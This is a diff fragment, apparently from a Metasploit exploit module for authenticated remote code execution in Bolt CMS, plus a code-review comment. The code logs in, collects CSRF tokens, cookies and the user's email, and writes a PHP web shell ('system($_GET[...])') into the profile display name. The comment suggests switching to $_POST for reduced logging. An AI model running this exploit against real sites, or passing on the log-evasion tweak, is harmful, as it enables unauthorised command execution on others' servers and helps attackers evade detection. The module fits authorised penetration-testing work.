modules/exploits/unix/webapp/bolt_authenticated_rce.rb

```diff
@@ -0,0 +1,408 @@
+    ]
+  end
+
+  def check
+    # obtain token and cookie required for login
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'bolt', 'login')
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    unless res.code == 200 && res.body.include?('Sign in to Bolt')
+      return CheckCode::Safe('Target is not a Bolt CMS application.')
+    end
+
+    html = res.get_html_document
+    token = html.at('input[@id="user_login__token"]')['value']
+    cookie = res.get_cookies
+
+    # perform login
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'bolt', 'login'),
+      'cookie' => cookie,
+      'vars_post' => {
+        'user_login[username]' => datastore['USERNAME'],
+        'user_login[password]' => datastore['PASSWORD'],
+        'user_login[login]' => '',
+        'user_login[_token]' => token
+      }
+    })
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    unless res.code == 302 && res.body.include?('Redirecting to /bolt')
+      return CheckCode::Unknown('Failed to authenticate to the server.')
+    end
+
+    @cookie = res.get_cookies
+    return unless @cookie
+
+    # visit profile page to obtain user_profile token and user email
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'bolt', 'profile'),
+      'cookie' => @cookie
+    })
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    unless res.code == 200 && res.body.include?('<title>Profile')
+      return CheckCode::Unknown('Failed to authenticate to the server.')
+    end
+
+    html = res.get_html_document
+
+    @email = html.at('input[@type="email"]')['value'] # this is used later to revert all changes to the user profile
+    unless @email # create fake email if this value is not found
+      @email = Rex::Text.rand_text_alpha_lower(5..8)
+      @email << "@#{@email}."
+      @email << Rex::Text.rand_text_alpha_lower(2..3)
+      print_error("Failed to obtain user email. Using #{@email} instead. This will be visible on the user profile.")
+    end
+
+    @profile_token = html.at('input[@id="user_profile__token"]')['value'] # this is needed to rename the user (below)
+
+    if !@profile_token || @profile_token.to_s.empty?
+      return CheckCode::Unknown('Authentication failure.')
+    end
+
+    # change user profile to a php $_GET variable
+    @php_var_name = Rex::Text.rand_text_alpha_lower(4..6)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'bolt', 'profile'),
+      'cookie' => @cookie,
+      'vars_post' => {
+        'user_profile[password][first]' => datastore['PASSWORD'],
+        'user_profile[password][second]' => datastore['PASSWORD'],
+        'user_profile[email]' => @email,
+        'user_profile[displayname]' => "<?php system($_GET['#{@php_var_name}']);?>",
```

Comment:
Note that this could probably be refactored to use `$_REQUEST` or `$_POST`, which offers flexibility and/or reduced logging.